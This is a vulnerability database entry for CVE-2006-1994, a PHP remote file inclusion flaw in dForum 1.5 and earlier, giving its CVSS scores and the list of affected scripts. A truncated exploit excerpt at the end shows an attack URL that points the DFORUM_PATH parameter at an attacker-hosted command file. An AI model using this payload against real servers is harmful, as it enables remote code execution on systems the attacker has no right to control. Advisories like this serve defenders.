7.5
CVSSv2

CVE-2006-1994

Published: 25/04/2006 Updated: 20/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in dForum 1.5 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the DFORUM_PATH parameter to (1) about.php, (2) admin.php, (3) anmelden.php, (4) losethread.php, (5) config.php, (6) delpost.php, (7) delthread.php, (8) dfcode.php, (9) download.php, (10) editanoc.php, (11) forum.php, (12) login.php, (13) makethread.php, (14) menu.php, (15) newthread.php, (16) openthread.php, (17) overview.php, (18) post.php, (19) suchen.php, (20) user.php, (21) userconfig.php, (22) userinfo.php, and (23) verwalten.php.

Vulnerable Product Search on Vulmon Subscribe to Product

dforum dforum 1.5

Exploits

dForum <= 15 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities Method found by nukedx, Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedxcom web: wwwnukedxcom This exploit works on dForum <= 15 [victim]/[dForumPath]/[filename]?DFORUM_PATH=yourhostcom/cmdtxt? Files -> aboutphp adminphp anmeldenphp closethre ...